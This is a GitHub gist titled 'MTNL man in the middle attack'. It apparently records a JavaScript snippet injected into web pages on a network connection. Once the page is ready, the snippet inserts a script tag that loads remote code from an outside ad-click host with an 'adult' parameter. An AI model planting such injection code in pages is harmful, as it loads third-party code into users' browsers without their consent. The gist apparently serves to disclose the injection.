Skip to content

Instantly share code, notes, and snippets.

@codebreach
Last active August 29, 2015 14:25
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save codebreach/766b4b6bbbe5b9461258 to your computer and use it in GitHub Desktop.
Save codebreach/766b4b6bbbe5b9461258 to your computer and use it in GitHub Desktop.
MTNL man in the middle attack
(function(w) {
var s = document.createElement('script');
var z = setInterval(function() {
if (document.readyState == 'interactive' || document.readyState == 'complete') {
clearInterval(z);
s.src = "http://36275.w4statistics.info/click.php?p=272542&adult=1&c";
s.async = true;
s.type = type = 'text/javascript';
w.document.body.appendChild(s);
}
}, 200);
})(window);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment